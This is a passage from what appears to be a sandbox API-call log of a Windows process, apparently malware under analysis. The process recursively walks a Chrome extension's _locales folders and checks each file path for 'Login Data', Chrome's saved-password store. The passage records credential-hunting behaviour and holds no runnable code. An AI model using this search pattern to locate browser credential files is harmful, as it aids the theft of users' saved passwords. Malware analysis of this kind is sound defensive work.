dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.556] GetProcessHeap () returned 0x8e0000 [0161.556] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned 137 [0161.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned 137 [0161.556] lstrlenW (lpString="\\*.*") returned 4 [0161.556] GetProcessHeap () returned 0x8e0000 [0161.556] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.556] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" [0161.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*.*" [0161.556] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.557] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.557] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.557] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.557] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.557] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe1, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.557] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned 137 [0161.557] lstrlenW (lpString="\\") returned 1 [0161.557] GetProcessHeap () returned 0x8e0000 [0161.558] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.558] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" [0161.558] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\" [0161.558] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\") returned 138 [0161.558] lstrlenW (lpString="messages.json") returned 13 [0161.558] GetProcessHeap () returned 0x8e0000 [0161.558] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.558] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\" [0161.558] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" [0161.558] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.558] GetProcessHeap () returned 0x8e0000 [0161.558] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.558] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json", lpSrch="Login Data") returned 0x0 [0161.558] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.558] GetProcessHeap () returned 0x8e0000 [0161.558] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.558] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe1, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.558] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.558] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.558] GetProcessHeap () returned 0x8e0000 [0161.558] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.558] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.558] GetProcessHeap () returned 0x8e0000 [0161.558] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.558] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="hi", cAlternateFileName="")) returned 1 [0161.558] lstrcmpiW (lpString1="hi", lpString2=".") returned 1 [0161.558] lstrcmpiW (lpString1="hi", lpString2="..") returned 1 [0161.558] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.558] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.558] lstrlenW (lpString="\\") returned 1 [0161.558] GetProcessHeap () returned 0x8e0000 [0161.558] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.559] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.559] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.559] lstrlenW (lpString="hi") returned 2 [0161.559] GetProcessHeap () returned 0x8e0000 [0161.559] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.559] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" [0161.559] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.559] GetProcessHeap () returned 0x8e0000 [0161.559] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.559] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned 137 [0161.559] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned 137 [0161.559] lstrlenW (lpString="\\*.*") returned 4 [0161.559] GetProcessHeap () returned 0x8e0000 [0161.559] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.559] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" [0161.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*.*" [0161.559] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.559] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.559] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.559] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.559] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.559] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x123, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.559] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned 137 [0161.559] lstrlenW (lpString="\\") returned 1 [0161.559] GetProcessHeap () returned 0x8e0000 [0161.560] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" [0161.560] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\" [0161.560] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\") returned 138 [0161.560] lstrlenW (lpString="messages.json") returned 13 [0161.560] GetProcessHeap () returned 0x8e0000 [0161.560] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\" [0161.560] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" [0161.560] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.560] GetProcessHeap () returned 0x8e0000 [0161.560] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.560] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.560] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.560] GetProcessHeap () returned 0x8e0000 [0161.560] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.560] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x123, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.560] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.560] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.560] GetProcessHeap () returned 0x8e0000 [0161.560] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.560] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.560] GetProcessHeap () returned 0x8e0000 [0161.560] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.560] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="hu", cAlternateFileName="")) returned 1 [0161.560] lstrcmpiW (lpString1="hu", lpString2=".") returned 1 [0161.560] lstrcmpiW (lpString1="hu", lpString2="..") returned 1 [0161.560] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.560] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.560] lstrlenW (lpString="\\") returned 1 [0161.560] GetProcessHeap () returned 0x8e0000 [0161.560] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 